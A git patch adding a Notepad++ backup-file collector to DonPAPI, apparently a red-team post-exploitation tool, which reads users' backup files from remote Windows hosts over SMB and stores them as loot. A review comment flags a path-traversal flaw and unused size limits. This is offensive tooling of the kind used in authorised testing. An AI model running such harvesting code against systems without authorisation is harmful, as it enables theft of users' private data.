From 1afae5f083798cc5cb36fedfd594cc3173c870b0 Mon Sep 17 00:00:00 2001
From: Deft_
Date: Thu, 17 Oct 2024 15:27:14 +0200
Subject: [PATCH] Create notepadpp.py

---
 donpapi/collectors/notepadpp.py | 61 +++++++++++++++++++++++++++++++++
 1 file changed, 61 insertions(+)
 create mode 100644 donpapi/collectors/notepadpp.py

diff --git a/donpapi/collectors/notepadpp.py b/donpapi/collectors/notepadpp.py
new file mode 100644
index 0000000..39d2a4b
--- /dev/null
+++ b/donpapi/collectors/notepadpp.py
@@ -0,0 +1,61 @@
+import os
+import ntpath
+from typing import Any
+from dploot.lib.target import Target
+from dploot.lib.smb import DPLootSMBConnection
+from donpapi.core import DonPAPICore
+from donpapi.lib.logger import DonPAPIAdapter
+
+
+TAG = "NotepadPP"
+
+class NotepadPPDump:
+ false_positive = [".", "..", "desktop.ini", "Public", "Default", "Default User", "All Users", ".NET v4.5", ".NET v4.5 Classic"]
+ user_directories = ["Users\\{username}\\AppData\\Roaming\\Notepad++\\backup\\"]
+ max_filesize = 5000000
+
+ def __init__(self, target: Target, conn: DPLootSMBConnection, masterkeys: list, options: Any, logger: DonPAPIAdapter, context: DonPAPICore) -> None:
+ self.target = target
+ self.conn = conn
+ self.masterkeys = masterkeys
+ self.options = options
+ self.logger = logger
+ self.context = context
+ self.found = 0
+
+ def run(self):
+
+ self.logger.display("Gathering notepad++ backup files")
+ for user in self.context.users:
+ for directory in self.user_directories:
+ directory_path = directory.format(username=user)
+ self.dig_files(directory_path=directory_path, recurse_level=0, recurse_max=10)
+ self.logger.secret(f"Found {self.found} notepad++ backup files", TAG)
+
+ def dig_files(self, directory_path, recurse_level=0, recurse_max=10):
+ directory_list = self.conn.remote_list_dir(self.context.share, directory_path)
+ if directory_list is not None:
+ for item in directory_list:
+ if item.get_longname() not in self.false_positive:
+ self.found += 1
+ new_path = ntpath.join(directory_path, item.get_longname())
+ file_content = self.conn.readFile(self.context.share, new_path)
+ local_filepath = os.path.join(self.context.output_dir, *(new_path.split('\\')))
+ # Stores the file in loot\TARGET\Users\{username}\AppData\
+ os.makedirs(os.path.dirname(local_filepath), exist_ok=True)
+ with open(local_filepath, "wb") as f:
+ if file_content is None:
+ file_content = b""
+ f.write(file_content)
+
+ # Stores files in loot\PowerShellHistory
+ os.makedirs(f"{self.context.output_dir}/../NotepadPP", exist_ok=True)
+ local_filepath = os.path.join(
+ f"{self.context.output_dir}/../NotepadPP",
+ f"{item.get_longname()}-{self.found}"
+ )
+ with open(local_filepath, "wb") as f:
+ if file_content is None:
+ file_content = b""
+ f.write(file_content)
+
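Review bot: Both local paths in dig_files are built from the remote listing's `item.get_longname()` with no validation, so a hostile or spoofed SMB server that returns a name containing `/` or `..` gets its content written outside the loot directory on the operator's host; the flat copy into `../NotepadPP` is the more exposed of the two because the name is used as-is. Reject such names where the false_positive check already runs, e.g. `name = item.get_longname()` followed by `if name in self.false_positive or "/" in name or "\\" in name: continue`, and consider confirming `os.path.realpath(local_filepath)` lies under the realpath of `self.context.output_dir` before opening it. `max_filesize` is declared but never consulted and `recurse_level`/`recurse_max` are accepted but never used, so every entry (including any subdirectory, which presumably should be skipped or descended into) is passed whole to `readFile`; the entries look like impacket SharedFile objects, so a `get_filesize()` check against `self.max_filesize` before the read would make the attribute meaningful. `self.found` is incremented before the read is known to succeed, so a `None` result still counts as a found file and produces an empty loot file. The comment `# Stores files in loot\PowerShellHistory` is copied from another collector and should read `# Stores a flat copy in loot\NotepadPP`.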